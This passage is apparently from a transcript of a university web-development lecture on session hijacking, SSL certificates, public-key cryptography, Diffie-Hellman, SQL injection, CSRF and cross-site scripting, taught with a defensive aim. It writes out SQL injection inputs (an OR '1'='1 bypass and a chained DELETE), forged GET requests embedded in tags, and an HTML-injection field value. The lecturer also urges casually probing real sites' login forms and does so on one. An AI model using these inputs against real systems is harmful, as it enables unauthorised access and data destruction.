keys, these session IDs, hard to guess. And that's what PHP does. The reason that thing is like 20 or 30 characters long is because, one, the odds of two people being assigned the same session ID is terribly, terribly small, so you can just rely on randomness and not so much uniqueness when generating these things. 2, it's really hard for some random adversary to just guess your session ID. 1, 2, 3, 4, 5 probably is not going to work. They have to choose an alphanumeric string that itself is very long, so you just get some probabilistic defense there. Someone suggested checking your email very quickly or your Facebook account very quickly. You could also just have the server rekeying the sessions a lot so that you only use the same session ID for a few seconds, a few minutes. Most servers, all servers don't do this, though you could implement this yourself, even with some PHP code if you want to be really paranoid. But frankly, certainly if you can automatically rekey sessions by changing that ID programmatically, so could your adversary automatically sniff your new ID and stay logged in. So it depends how interesting you are to the bad guys. IP address, this is another one that would actually address a lot of these problems, except in shared IP environments, which is many, many places these days. And then encryption is probably the most robust solution. It just costs someone something.
Can you use the MAC address instead of the IP address?
Good question. Can you use the MAC address, the Ethernet address of the computer? Not really, because that is a layer 2 detail in the whole TCP/IP stack or Internet Protocol stack. And websites, third parties, which operate at layer 5, as it's called, would not have access to that information. The nearest router would, but not someone arbitrary like Facebook. But it's a good thought. But even then, it's a little white lie of the industry. MAC addresses are not unique. They are reused. Just hope you don't get 2 of the same ones on your network. Other questions? All right. What? Yeah?
Yes, most of these defenses that you're describing here sound like they're done on the server side, not from the client side. So if you just do a search and you go to some, say you're looking for some information, you do a Google search, you get something on the site, it's really depending on what the site did. It is not much as the client, at least if I'm hearing you correctly, it sounds like most of what you're talking about is when you're developing a site, how to protect your site that you're developing. As a client who just searches something,
Correct.
it doesn't sound like you can do much.
Correct. So to summarize for camera, it sounds like most of the defenses I'm proposing are very much server-side, developer-oriented, not user-oriented. So that's true. Though I'm trying to scare the consumer in you, I'm hopefully appealing to the technical person in you so as to address these or to avoid these problems when you implement your website yourself. But that's why I resorted to the very non-technical SOL, which users generally are. If you want to use Facebook and agree to its terms of service, I'm sure someone in there is some mention of the vulnerabilities inherent in their site, or that's implicit in the fine print these days. All right, why don't we take a 5-minute break? All right, so we've talked about SSL over time, and that seems to be the silver bullet that's been fixing all of our problems today. So how does it all work? What are the implications? And let's see if we can't look in slightly more technical detail than we have in the past. So if you turn on SSL for a website, which you can't do on cs75.net, but you could on your own servers that you're running, or if you have a VPS, virtual private server, that you're paying someone for, you could do it there. If you have a shared web host that lets you do this, you could do it there. But one of the biggest gotchas for SSL is that it requires a unique something. IP address, which is one of the most annoying aspects of SSL. If you want, for virtual hosting, if you want to have multiple websites, foo.com, bar.com, baz.com, with different domain names, all protected by SSL, you have to get SSL certificates for each of them, which that's not so bad, $10 each, give or take, at a minimum. But you also need a unique IP for each. And even though there's 4 billion possible IP addresses, we are rapidly running out, or so the world says. And there are some dire predictions, like in 2 years we'll be out of IP addresses. The world is getting more clever. Even Harvard will likely move to a NATed environment in a year or two, whereby students stop getting 140.247 addresses, but it'll be 192.168. Whatever, or the equivalent. But this is problematic because IP addresses, because they're in scarce supply, tends to drive up demand and therefore pricing. So you will often pay more from a third-party host if you want a unique IP address. Maybe not more, maybe just $1 or $2 more per month, but realize it's an added cost. This isn't necessarily the case for your own domain. So we, for CS75.net, have, or other courses that I teach, we have various subdomains. So we have foo.cs75.net and bar.cs75.net and baz.cs75.net. But the fact that they all share a common domain is actually a good thing, because you can buy what are called wildcard certificates, which means your certificate is valid for star.something.com. Now this is good because it technically works. This is bad because how much do these things cost? Most recent one we paid for? $199 for 1 year. It's idiotic. And it's because a whole market has arisen. I'll apologize in advance for a slight rant here, but an entire market has arisen for SSL certificates, which on paper and in theory actually makes good sense. In theory, the whole purpose of entities like Network Solutions and GoDaddy and all of these registrars is because you have a trusted third party saying, David Malin at 33 Oxford Street, Cambridge, Massachusetts, does in fact own MalinRouge.com, and he is who he says he is, and you can consult us to verify this information. But in a world with billions of people, where you can buy SSL certificates for $10, and you can buy domain names with bogus credentials, certainly no of invalid mailing addresses, this really doesn't work as well in practice as it does in theory, this whole idea of trust. And so frankly, and the slight rant is, this is a whole scam, the fact that any of us have to pay for SSL certificates to get these layers of trust. You can go to websites like VeriSign in particular, right? The name you trust, apparently. And you can pay ridiculous sums of money for SSL certificates. So let me go to SSL certificates here. And let's just see if they'll tell me prices somewhere obvious. Buy SSL certificates. Okay, so they don't list their... You know it's bad when they don't list their prices very obviously. So let's first pick on this stupidity. So you get a $250,000 warranty, whatever that means. You get to put VeriSign's logo on your website. This is technically interesting for people in this room. So this is something, right? You don't want to pay someone, you don't want to save a few dollars by getting like an 8-bit SSL certificate. Not very hard to break that. So big numbers are good. 256, 128 at a minimum. You can even generate your own 1024-bit SSL keys these days. So the world is getting tighter. So here's 40-bit versus 256. You pay them less, though. They'll only warranty it. Frankly, I don't even know what these warranties mean. They probably mean that if someone happens to hack the encryption being used in SSL, they will insure your website up to this many losses. Now, the mathematical probability of that happening is clearly working in their benefit, not ours, because they can come up with these ridiculous schemes for their thousands of customers, right? They're not the federal bank here. They're not going to be able to insure your websites up to this amount. They're banking on the fact that mathematically this isn't going to happen. Anyhow, ignore all of the hype here. So let's try to just, maybe product selection wizard. Maybe this will help me decide. Okay, so what kind of information do I collect or share with my visitors? Let's choose the scariest one, probably. Payment or credit card information. More completed online transactions are better for my business. This is just stupid. Like, why would you ever click no? All right, do you want to offer the strongest encryption available? Yes. I do want to purchase 4 or more. Get product recommendations. Oh my God, I don't want to read all this. All right. Oh my God, overwhelming. Oh, look, $1,405.30 per year. I mean, this is atrocious. So, and I can say this rant, I feel, with some technical justification. You're really not getting much more of technical value than you are of the marketing value. So this, frankly, is probably more of a CYA kind of thing, cover your ass kind of thing. Right? Let's buy our SSL certificate from the most trusted people out there so that we can assure our customers we are using the best crypto possible out there. And there is one slightly compelling detail. It's probably the case that there are more browsers out there that happen to know about the certificates that are approved by entities like VeriSign and by Network Solutions, and maybe less so by the smaller fish from whom you can also buy SSL certificates. But if you poke around your browser's security certificates that Mozilla distributes with Firefox, that Microsoft distributes with Internet Explorer, it's a pretty long list, and it only gets longer. And this is where the layer of trust comes. If you're using IE and you trust Microsoft, Microsoft says they trust all of these companies, so you can therefore trust trust any websites that are using SSL certificates from any of those companies. But you are now so far removed in this chain of trust that it really becomes kind of inconsequential when your users themselves are essentially anonymous to begin with. So technically speaking, I can say only anecdotally, maybe don't quote me on this or expect any warranties from the course, we have been perfectly fine for many years in any website, and I do this even in consulting practice, spending $29.95 for an SSL certificate with a sufficiently large key, and actually you yourself generate the keys. You would use your own command line on a Windows machine, Mac, or Linux computer. You run a command. It's slightly annoying how to do it. Usually use a free tool called OpenSSL. You say generate a public-private key pair, more on that in a moment, using a 1024-bit key or something really big. Then you essentially inform someone like GoDaddy or VeriSign or whomever, here is my public key, give me a stamp of approval so that I can then present to the world this so-called certificate, which is the commingling of my number with GoDaddy's number or VeriSign's number so that the world knows that VeriSign or GoDaddy has approved this certificate. And in theory, and this is an option you can often enable in browsers, you can tell your browser to check for revocation of certificates. And this too, in theory, is very smart. You can check with someone like VeriSign or GoDaddy, hey, I'm about to initiate a secure transaction with badguy.com. I just wanted to check if you've maybe revoked badguy.com's certificate recently, because if so, I'm not going to pursue this transaction. But that feature is almost always disabled in browsers by default, except for the real paranoid who want to re-enable it because it involves contacting their server pretty much any time you try to access a website, checking for revocation. So in principle, these are actually very smart cryptographic ideas, but in practice, the whole thing's a scam when you're actually spending money on these things. So again, no warranties from CS75, but it's probably not worth spending $1,000 of your own dollars or your company's money, at least until you actually run into a real-world problem with some of these cheaper certificates. And GoDaddy is the largest internet registrar today. Cheesy though their marketing and website and upselling attempts are, I mean, they actually are a credible player in the space. So you shouldn't be turned off just by all their silly marketing that they tend to have. So if I go to SSL certificates, let me see if I can... I don't want to log in. I want to see prices. This is the downside of their site. It's ridiculous. I get a lot of negative things to say about all these companies, I guess, so I'll stop. I don't want to log in as the cat. Oh, here we go. Okay, so this is what I want. And I'll admit, I get confused by all this stuff all the time. So here we go, 1 year for $29.95, and I can renew for multiple years. And here, too, is where it gets annoying. You have to renew these damn things every year or every 2 years. And I will say from personal experience, because I install SSL certificates so rarely, and I'll show you the snippet of configuration with which you can do this. Or actually, no, we showed that actually a while ago. But it's something you can put in your httpd.conf file. It's not terribly hard in theory, but inevitably every 11 months I forget how I did it the last time. So I frankly now buy certificates for multiple years for domains I think I'm going to keep around for a while. Save yourself a headache 11 months and 29 days hence and just get something for multiple years so you don't have to go through this process multiple times. But for the course and for other consulting gigs, we pretty much go with the cheapest certificate, $30 a year essentially. Wildcard certificates do make sense for a couple of reasons. So the price tag is unfortunate here in the bottom corner. But what this means is you can protect via SSL any number of subdomains. Now, you can do the math. If this is roughly $200 and the other one costs $30, you really need to buy 7 certificates before this makes financial sense. But there's also some technical value to it. So we use this on one of my course's servers, and the administrative convenience is huge because we can create within a minute or 5 minutes a brand new virtual host using a different subdomain, and we don't have to bother going and buying the additional certificate, installing it, configuring it. So there is actually a technical convenience of having wildcard certs if you think you're even going to use subdomains. So do realize that that exists as well. So with that said, once you have this thing, you install it on your server. The method differs whether it's your own server or third party. Thankfully, if it's a third party, you often go to some web panel a la DirectAdmin and you copy and paste what is essentially a text file into their web page and click submit, and they do the configuration for you. or you upload a couple of text files, your private key, public key, and certificate, to your own web server, add 3 or so lines to httpd.conf or the equivalent, restart your web server, and then it knows about the SSL certificate as well. And you have to enable SSL itself, usually via another option or two. So it's fairly well documented, but just the implementation details do differ based on server type. So definitely doable and definitely worthwhile for anything that we've discussed thus far in terms of threats. So, questions?
So will you show us what happens if you're on an HTTPS site, like what traffic goes across? Like if you're on a login site, does that not pass your username and password and secret text?
Good question. So can I show you what goes across the wire between A and B when you're using SSL? Not easily. So I could install a proxy and actually show you the actual encrypted binary traffic, but it takes more minutes than we could actually pull off here correctly. What you would see is essentially a stream of nonsense. You would see the appearance of random zeros and ones going across the wire, and only once the data was received by the web browser or received by the server would that information be decrypted, and then you would just see the actual HTTP headers.
After you showed us about live HTTP headers, I went to Facebook and did my login and had it up, and it sent my username and password in clear text.
It didn't. You're seeing it before it got encrypted.
Okay.
So live HTTP headers operates at the application layer. What you could use, it's been a few years since I used this, but Charles debugging proxy I think I've used before. Yeah. So this is a really interesting tool that if you want to play around with this, it's actually great fun. Similar in spirit to live HTTP header. So just charlesproxy.com. What this is a little server. Last time I checked, this is a little server, free, that you install on your own computer and run it on port 8080 or whatever. And you configure it to intercept all requests from your browser to go through it and then go to the website like facebook.com. And that means Charles can then see everything between points A and B. So if you're using SSL, you would actually see the binary traffic or the nonsense going across the wire. Live HTTP headers, though, is not in the middle of this transaction. It's at the endpoint, which is why you saw it appearing to go through the clear. So this is fun to play with, especially if you just like understanding and getting your hands dirty with this stuff. charlesproxy.com. So how does this all work? Well, just realize, and you can take whole courses or read whole books on this stuff, but there's actually a real beauty or magic to how SSL itself works. So it uses this technique called public key cryptography, which is brilliant because it solves this seeming chicken and the egg problem. So cryptography generally relies on knowing some secret. Alice wants to talk to Bob, and the means by which Alice talks to Bob securely is they take their message, they encrypt it using ROT13 or using DES or AES or any of these cryptographic algorithms that you may have heard of using the secret key, and only the other people in the world who know the secret key can reverse that process. So that's called private key or secret key or symmetric key encryption. And it's symmetric in that you use the same key in both directions to encrypt and decrypt. But this is a problem. If I visit Amazon.com, want to type in my credit card and buy something, what do Amazon and I not have in advance? We don't have a shared secret. I have never even met anyone from Amazon.com in person, so they've certainly never handed me or whispered to me a shared secret, a really big random number that we can use to have this encrypted conversation back and forth. So here is the chicken and egg problem. How can Amazon and I have a secure interaction via the internet if we don't have a shared secret in advance? And the only way to get a shared secret to each other would be to send it to each other, but we don't have a means of communicating securely yet. So I would be sending the secret in the clear, which would obviate the whole point of this cryptographic process, right? So you can think of silly real-world scenarios. Fine, I call someone at Amazon, they read me back verbally a number, I type it in, I use this. It doesn't scale, it's not necessarily secure, and it's just not going to happen. So public cryptography addresses that chicken and the egg problem. It allows me to establish encryption with some person that I've never met, never talked to, but between me and their server, my browser and their server. How does this work? Well, when I install my browser, unbeknownst to you probably, a thing called a public key and a private key are actually generated, and they're stored somewhere on your hard drive or in RAM. And these are really big, somewhat random numbers, but that have a mathematical relationship between them. The public key is going to be used for encryption. The private key is going to be used for decryption. And intuitively, that should make sense because only you want to be able to decrypt information, so that thing should be kept private. But the neat neat thing about public key crypto is that you have these two numbers now, public and private. You can tell, and you should tell the whole world what your public key is. Literally, post it on your website, put it in your signature, put it on in your blog, wherever. It is meant mathematically to be public. But the private key you keep secure. You hide it in your hard drive, you put it on a USB stick, you keep it private. Amazon.com does the same thing. Or rather, when they install Apache or whatever they're using, part of the installation process will generate that public-private key pair for them. And then they don't post on their website, per se, their public key. But the means by which SSL, Secure Socket Layers, works is when a browser talks to a server for the first time, the server will say, here's my public key certificate, or here's my public key. What does the browser say? Here's my public key. So browser and server each present to each other their public keys, and this is totally legit, because they're public, they can go across the wire in the clear. But what we're not transmitting, perhaps needless to say, is our private keys. So what this means is that Amazon, when it wants to talk to me securely, it encrypts its data with my public key, and when I want to talk to Amazon, I encrypt my data with Amazon's public key. And only each of us can reverse that process with our respective private keys. Now that's a slight white lie. So SSL tends to use algorithms like RSA, which you may have heard of. Very much in vogue in other uses, ATM machines, this kind of stuff. Very popular algorithm. But it's expensive. It's more computationally expensive than symmetric key algorithms. So buzzwords here are DES, triple DES, AES, Route13, kind of a joke one though. These are symmetric key ciphers that just use one shared secret. So the neat thing about SSL and similar protocols is they actually generate a shared secret. For instance, my browser or their server will pick a really big random number. We will then share that number between ourselves by using public key crypto to exchange that big shared secret. But that costs us a bit of time, a bit of computational cycles that we want to avoid back and forth, especially if the user's logged in for a while. So what we use the encrypted public key channel for is to share this private key. Let's call it secret key, this really big shared secret. And henceforth, then we resort to triple DES or AES or an algorithm that's much faster. But we've solved the chicken and the egg problem using this approach here. And that's really quite neat. Now, it's not perfect, because there's this thing called a man-in-the-middle attack. SSL does not protect against this. If the user sitting next to you in Starbucks is a bad person, they could, in theory, intercept your request for Amazon.com by sniffing your traffic and immediately respond saying, I am Amazon.com. And maybe I'm running my own copy of Apache, right? Most of you know that's possible on a laptop even. I can say to that person, by having sniffed their traffic, I am at Amazon.com. Here's my SSL certificate. My browser would then proceed to establish an encrypted connection with Amazon.com so that my traffic is perfectly encrypted, but to the guy next to me. And so this is a so-called man-in-the-middle attack, whereby if you can interpose yourself between points A and B, this stuff is not broken. Then you have a trust factor as to not knowing who that middleman might be. So it actually would be a much better world if I did know in advance who Amazon was, and they actually gave me a prefab certificate to use when talking to them, but that's just not practical. So the reality is, even though we've kind of, presented problems today, then mitigated them with some technologies, it's still imperfect. But that requires even more savvy than just session fixation, stealing your session cookie for Facebook or whatnot. And again, the odds of someone masquerading as Amazon and then not fulfilling your order just to mess with you, then this is when you have really specific concerns that these threats become more credible, I think, or more worrisome, because we've at least raised the bar so far. So that's a crash course in public key crypto. Any questions? No? Okay, I'm going to skip this one. I would suggest that this slide is about Diffie-Hellman, which is an algorithm that's actually fairly... No, let's not skip it. It would be faster to do it than to skip it and explain why I'm skipping it. So here we go. So let's just, without going into very intricate mathematics, RSA is actually a bit more complicated with how you establish this shared secret, this public key and private key that have this interesting mathematical relationship. So let's pick a different protocol called Diffie-Hellman that's been around maybe even longer in various forms, but that's actually a little simpler to understand because it just involves some exponentiation, raising something to a power. But it answers the question, how can you establish a shared secret without knowing the person in advance? So same idea, but different approach. So we have two pieces of the story here. On the left is someone called Alice. On the right is someone called Bob. And there's essentially two steps of this process, hence the two arrows, top to bottom. So Alice decides with Bob in advance, and they can do this totally publicly on their websites, via blog, email, whatever, what a number G is going to be and what a number P is going to be. P is supposed to be prime, so it's got to be a valid prime number, and G is what's generally called a generator. And generator is actually pretty simple. It can be 2, literally the number 2. But P is usually a big prime number that maybe they've looked up. Doesn't have to be secret, but it's a big prime number. If you've ever heard that crypto often devolves into assumptions about prime numbers, here's a hint of that, the fact that P is prime. So what does Alice do? Alice does the following. She knows G, she knows P. She then picks a random big number called A for Alice. She then raises G, maybe it's 2, to the power A, and then takes that modulo P. So the mod operator, the percent sign, she does that mathematics, which it's a really big number, but there are efficient ways of computing G to the A mod P without G to the A becoming a huge, huge, huge number. There are clever ways of doing that. So at this point in the story, Alice has in memory a number called T of A, T sub A, which is just the result of doing G to the A mod P, only one of whose values she chose randomly, A. Now, Bob also knows G. He also knows P. He picks his own private number, B. This is his private key. He then does the same mathematics, but with his B, and he gets a big value, T sub B, which is G to the B mod P. So they both now have 2 numbers in mind. Alice has A and G to the A mod P. Bob has B and G to the B mod P. So they each have a private key and then this temporary value called T sub A and T sub B. Those numbers they send across the wire, and anyone can intercept that if they want. But the interesting thing now is the following. Once Alice gets Bob's T to the B and Bob gets Alice's T sub A, they can each take those received values and raise them to their own private value. So Alice now receives T sub B. So I'm looking at the bottom left here. Alice receives T sub B, which again is G to the B mod P. That's one big number. Alice then raises that whole thing she just got from Bob to the power A. Now, if you're kind of working ahead, that gives Alice a value G to the A times B mod P. Because when you raise something to a power and then do it again, it's the same as multiplying the exponent. So that's G to the A mod P, G to the AB mod P, or equivalent, G to the B times A mod P. They're associative, it doesn't matter. So with that said, Bob does the same thing. So at this point in the story, what has happened? Alice still has A, but she also has G to the AB mod P. Bob has B, but he also has G to the AB mod P, i.e. they have the same value. They have a shared secret, if you will. So this is one way of solving this problem of getting secret information across the wire using some very public mechanisms and even some very public values, but some of which, thanks to mathematics, are kept secret. Now, why is this ultimately a secret? Well, this thing here, G to the A mod P, which we started calling T sub A, it is very hard if you intercept, which you can technically, T sub A, and figure out what A actually was. Right? You would essentially have to brute force it. You know G, you know P. You have to try all possible values of A and see if they give you this same value you saw across the wire. And the assumption is that if you use big enough values, long enough numbers with enough digits, it'll take you more time than there are atoms in the universe to figure out that math via brute force. So this is just a hint of the fact that even though I've waved my hands often at like mathematics and doing this and that, you can actually use some fairly simple mechanisms to achieve essentially the same idea. So SSL does not use Diffie-Hellman, but it uses something similar in Spirit. And here's how relatively easily you can do this. And these were huge advances in the 60s, 70s mathematically, maybe a bit prior. And pretty accessible. Well, I'm glad we didn't skip it. Okay, any questions? Okay, so let's make this more real. So we kind of have gone to a very low level now. So we started high talking about Facebook and HTTP, kind of dove in down deeper into how the traffic's getting from point A to point B. Let's now conclude by looking at the application layer stuff again. So SQL and MySQL, something we've been using all term, all in recent weeks. And we've kind of been preaching in the specs and in lecture, use MySQL real escape string, right? Ridiculously long named function, but very useful. And among the things it does is it escapes things like quotation marks, because you've probably seen in your own code, you're often using single quotes or double quotes inside of a SQL query, and bad things tend to happen syntactically if you put the wrong number of single quotes in there. So MySQL real escape string, among other things, backslashes quote marks that shouldn't be actual syntactic features of the query you're executing. So that means a user shouldn't be able to type in quoted strings and confuse the SQL parser. So what's the context here? Well, hopefully we do this. So a fun at-home exercise, which you should, I'm supposed to say, not use for malicious purposes, whenever you go to a website that asks you to log in, just kind of mess with them. Say something like, let's say your name is O'Malley. All right, so pick an Irish name, which legitimately has a single quote, and then try to log in. And if bad things happen, it's probably because they are not properly handling single quotes or other such syntax. Now, we seem to be. We detected that's an invalid username and password. It's interesting, security-wise, if you actually get a 500 error or just really bad stuff happens when you try to log into a website using that syntax. And I'm guessing, can we break this on any website? This is literally like phishing on the internet, but if I go here, Marriott.com, let's say O'Malley. Let's see if they do what we're about to preach. This is not going to work, I bet. They're smart enough. Okay, that didn't work. But on your own, next time you visit any website that has a form, just type some quotes, see what happens. Because interesting things can happen, and as you know in the bad guy world, anytime something interesting happens that shouldn't, it's an opportunity potentially to exploit. And this is what SQL injection attacks are all about. So suppose that you have a form like this, as we do on our website. It's got 2 input fields. Hopefully we're escaping user input. And in fact, we are, but this query is not. So here's a very reasonable sort of computer science 101 type query, syntactically correct but dangerous. I'm using sprintf to just create a string on the fly. I have 2 placeholders, quote unquote %s, quote unquote %s for username and for password, and then I'm plugging in dynamically those values from the post field. But you can imagine now if I typed in O'Malley and then I just used sprintf to insert those values, I'm going to get improper nesting of quotes. I'm going to have a single quote, and then another single quote, one of which came from the user, 2 of which came from me. So that's bad. So as an aside, PHP has this annoying feature called magic quotes, which often is on by default on a web server. Henceforth, mental note, if you ever are banging your head against the wall as to why all of your users' inputs are getting escaped for some reason, PHP used to do this out of the box, but it's now been a deprecated feature. Magic quotes quotes anything in $_get or post for you. It's a big headache because it's much nicer to assume that you'll do the escaping and not have it automatically done for you without you realizing it. So on a typical server these days, that will not be escaped for you. So suppose I am that bad guy and I decide to log in with a bogus username. How might I do this? So this string here, this is not what I have in my own code, but this is worrisome. Because what would this SQL query return? What's that? Yeah. So not that you would do this accidentally. It's pretty hard to accidentally code something stupid like this. But it seems clear that this is a bad, dangerous query. Because no matter what, Boolean-wise, this is going to return to me a user ID. Because 1 always equals 1. So it's going to return a UID if jharvard and password, if jharvard exists and the password exists or 1 equals 1, which is always going to be true. So that's a little worrisome. So hopefully I don't accidentally put this query in my code. Otherwise, anyone's going to be allowed through if they try logging in as jharvard. But wait a minute, what if the user can concoct this for me? So take a look here. We have our own web form from the website. Suppose that I'm still not using MySQL real escape string, and I'm messing with the site now. I'm jharvard, but my password is, and I've removed the bullets so we can see what I typed in, 1, 2, 3, 4, 5, single quote, space, or, quote unquote 1 equals, quote 1, no close quote. So what's about to happen? Well, if you consider my original legit query, where I'm using quote %s quote, this value is going to be sandwiched in between those single quotes. That's kind of interesting because I've now just completed what is otherwise an incomplete quoted string, thereby creating, it seems, precisely the red, scary query that I hoped I myself never wrote. So in fact, if I do this, we are okay by using real escape string. But if not, I've actually created a query that looks like this. And this will essentially log the user in. How do you know that this is happening? Well, my silly O'Malley example will often trigger some kind of error in the PHP or the SQL or whatever code, whatever the website's using, that will just say a server error occurred. And that's probably indicative of the fact that the programmer forgot to escape his or her quotes, at which point the bad guy can then start doing some clever things that they learned in class, like this. And you can pick any number of examples. I said 1, 2, 3, 4, 5, but if the Boolean logic is implemented in a certain way, you don't even have to know you certainly don't have to know the user's password. You can put any value there or really none at all. The point, though, is just to concoct a syntactically valid SQL string. So when you do practice what we've been preaching and use MySQL real escape string or your language's equivalent, what that red query becomes is actually this safe green query. MySQL real escape string will backslash any of these single quotes in that query to ward off precisely this problem. So this is totally safe because now those quotes will be interpreted as literal quotes in the password, which means I'm asking select UID from users where username equals jharvard and password equals 1, 2, 3, 4, 5 quote space OR space quote 1 quote space equals space quote 1. And that's obviously not going to be my password, or hopefully it's not going to be my password. Otherwise, they just got lucky. But this is now safe. So if you've ever wondered what a SQL injection attack, it just means somehow tricking the SQL parser or PHP or whatever into executing some query that you did not intend. And it can be worse than this. It depends on the language you're using and what it tolerates. But if you're allowed to insert things like semicolons into the query, you could imagine having a query like this red one, semicolon, delete from users, semicolon. Then not only would the select query get executed, but if the semicolon is allowed by the parser, that would execute the second query, which is delete from users, which means now you've actually impacted the user's database. So bad stuff happens when you don't call that very long named function, or the equivalent in some other language. But easy to fix, right? Thankfully. Okay, this is one time where we have a problem, but we have a solution. And if you've not been using it yet, do realize what bad stuff can happen. All right, so project 3 is currently in your hands, or was in your hands. And the reason that you've been having to write this PHP file that talks to Google News, gets back the response, and then hands to your own code in JSON format or XML format or XHTML format, all of those articles, is because of this thing called the same origin policy. And this has come up before. This is an excerpt from some Mozilla documentation that addresses in more technical detail what it is. But in short, the same origin policy means that you cannot have a web page that you wrote with some JavaScript that you wrote and have that JavaScript via AJAX grab content from another domain altogether and integrate it back into your own website. You would get a same origin policy violation. So this means that only data from the origin of this JavaScript code, essentially, can be added to the website. So this means you could not, for Project 3, write JavaScript code that talks directly to Google News, grabs the RSS, and embeds it directly into the map. This is why you have to go through the server, through PHP, so that it appears to be coming from the same origin, from cs75.net or from your own server. So minor headache, but it's also a good thing, and this came up a week or two ago. If you could allow JavaScript code, once executed, to visit any old website, you could have very interesting opportunities for distributed denial of service attacks, whereby you visit badguy.com. He has some JavaScript code that forks off AJAX calls to 1,000 websites that he hates, and they all appear to be coming from you. And if multiple people do this, and multiple people do it again, then you have all of these HTTP hits coming from people not even the bad guy, and it's just because he tricked them into executing some JavaScript code. So in general, this is a good thing, but does impose some complications. So what does this affect? Absolutely AJAX, but it's also other things as well. And these are sometimes for good. So things like cookies, which we discussed, should not be viewable by anyone other than the same origin as those cookies, but windows and frames too. And this is actually a good thing from a privacy standpoint because it's very popular in the advertising world to have like embedded ads or flash files or movies or JavaScript code from DoubleClick or from Google Analytics or from any third parties running on CNN.com or Facebook.com or whatever. It's kind of worrisome if those websites could just look at the URL you're visiting, because then those websites would know directly exactly what websites you're visiting. And you probably don't want this just in principle. So third-party JavaScript, by this policy, cannot look at the value of window.location.href. If you're familiar with that property, that is the URL of your browser, and that too is because of the same origin policy. Only your JavaScript code can do that. So, interesting stuff, generally a good thing, but also a headache if you realize that you want to try to circumvent some of these things yourself as a developer. Another example, if you've got a web page and you've got an iframe inside and the iframe's content comes from another website, even if you own the outer website that's including that page, you can't have your JavaScript look at the DOM inside of that iframe, because that too would violate the same origin policy. You can't update it, you can't extract data from it, same deal. So as developers, you start to trip over this eventually. Okay, so there's two final attacks, and these are kind of silly buzzwords, but they actually refer to some techniques that are actually very clever and the first relates very specifically to Project 2, something you might not have realized and amazingly, it's crazy darn easy. So this is a ridiculously long name. So cross-site request forgery, sometimes called CSRF or XSRF. Right, so that's what the LEET described these things as. So here's the scenario in English. So 4 steps to this attack. You, a normal user, log into project2.domain.tld, so your implementation of CS75 Finance. Then you accidentally or whatever visit a bad guy's website using the same browser. The bad guy's website has a link like this, project2.domain.tld/buy.php, symbol equals that penny stock. So you accidentally click this link. You're tricked into it. Or by some means, you click that link. Because with the same browser, the same process in memory, you've already logged into Project 2, this is just a GET request. And if you have implemented Project 2 using GET requests for buys, for instance, or even sells, which you may very well have, think back on your own code, you've just been tricked into buying this stock because you've been immediately whisked away to buy.php on a website you already happen to log into. So this is a cross-site forgery request in that someone else has forged a valid HTTP request, this one a very simple GET string, and the website in question, the victim, was accidentally or foolishly or naively implemented by you without realizing, wow, it's really easy for other people to create GET requests just by creating URLs and phishing emails or on their own website. And frankly, this is one of those numeric things, right? If you have a bunch of bad websites in the world, odds are they'll be visited by people who just so happen, probabilistically, have logged into their PayPal account recently or their bank account recently. And if you trick those users into clicking links like this, and if those websites, PayPal, your bank, Facebook, whatever, were foolish enough to use GET requests for very important, sensitive things like buying, you could be tricked into executing some functionality in that website that was never intended by you. It's very simple, too. You just forge the GET request. So how do you defend against this as the developer? Okay. So you could use post. It's still possible to do this, right? Like we forged posts, I think, when we faked Google. We might have used GET at the time, but I could have just used post, and I could have posted information to Google. So post requests can still be forged. It takes a little more ingenuity because now you have to trick the user into clicking a button or something that submits a form. But we've seen how to do that now with JavaScript. So you could do that. So that's one approach that at least raises the bar. And that's what security is ultimately all about, right? Rarely can we fix things, but we can make it hard enough that the bad guys just go away or lose interest. So what's another approach here? How else can you avoid this problem? So you can check the HTTP refer variable. Unfortunately, that's only sometimes sent. Browsers do not have to send that. There are certain privacy blockers for the paranoid that just restrict it from being sent at all. So a valid approach, but it would mean your website would break for some percentage of people. What else could you do? What does Amazon do? They're actually a really neat example of this. You log into Amazon. They pretty much remember in perpetuity that, hi, David, welcome back. I stay logged in even days later. But if I go to buy something, what happens, even though I'm logged in? They prompt you to enter your password again. So Amazon made the very wise decision that anytime something that could cost us money is about to happen, we are going to ask you for your password again. And that should interrupt any such attempts to automatically buy or do anything sensitive like that. You could just simply have a confirmation screen too. So realize that this approach of tricking the user into executing this GET request assumes that you, the developer, didn't so much have a confirm button or a yes button, because you could still stop this thing from going through if there's some part of the process that can't be forged. And one such approach would be a confirmation screen. So the problem's maybe not as bad as the ease of the attack seems, but Amazon takes the approach, the heavy-handed approach of requiring login. And that probably does save them some money and save them some fraud cases. So fairly reasonable approach. So turns out, though, and this is where it gets actually scary and also enlightening, I think. It doesn't have to be a link the user clicks. You can just embed any one of these URLs in the bad guy's website, and they will be automatically followed by the user who visits it. And this is where, so this doesn't apply to post, but for GET, it's terribly easy to forge GET requests. You can just glance at these. I've got one that's an image tag, a script tag, an iframe, a script. All of these will induce a call to project2.domain.tld hands-free, which is the scary thing. And this is hard to defend against unless you do have those checks like reprompt for password, have a confirmation screen. So again, hopefully this opens one's eyes. And in fact, do consider, if you haven't already, if you're watching at home, check back at your code. Because if you did something like this, don't do it again, at least for your real job, since it's very easy for this to happen. All right. So, okay, so just to, here, I tried to make sure we address some of the possible solutions here. So post was suggested, refer was suggested. You can do other things like append session tokens, like the PHP sesh ID, so at least there's no way the bad guy is going to know what your current cookie value is, so you could require that some unique value be embedded in the URL for the transaction to go through. Kind of annoying to implement that stuff, but a CAPTCHA or just another line of defense like Amazon prompting the user for interaction could work. So any number of these approaches are possible. But I think the scary takeaway is just how easy it is to trick a user into loading a page unknowingly. So do keep that in mind. All right, finally, there's this cross-site scripting. So this is a buzzword that's even more popular on Slashdot and the like. So I had to make this font a little small here, but here's the three-step scenario. So you click a link like this, and I tried to come up with two parties here. Vulnerable.com has a value parameter called foo in some form. And in this case, vulnerable.com made the foolish mistake of not escaping, not their SQL queries, but they didn't escape their HTML content. So it's very common in a form to repopulate it with fields that the user provided, right? You try to log into most websites, you type the wrong password, you see the form again, but what's already there for you? The username. So most of you, I'll go out on a limb because I even don't do it sometimes. Most of you probably, when you're pre-populating a form, let me type it for clarity, probably don't recall, I'll say. Let's do this here. So if I'm pre-populating a form, we've seen in class examples of this. I would do something like input, name equals, let's call this email, and then type equals text, and then value equals, I might do something like this. Post, email, and this code here, this would pre-populate the value of the email field upon unsuccessful login with whatever email address the user typed in before. Now, this is worrisome because suppose the user actually put in their email field not mailin, but something like quotes / this, and then boldface hi. And then let's say something simple like span style equals quotes. Okay, I did that on the fly. Hopefully there's no bugs. But it's the same idea as the SQL hack. So I have typed in sort of an incomplete HTML expression because I suspect that the user, the developer, you, are going to blindly insert what I type back into the 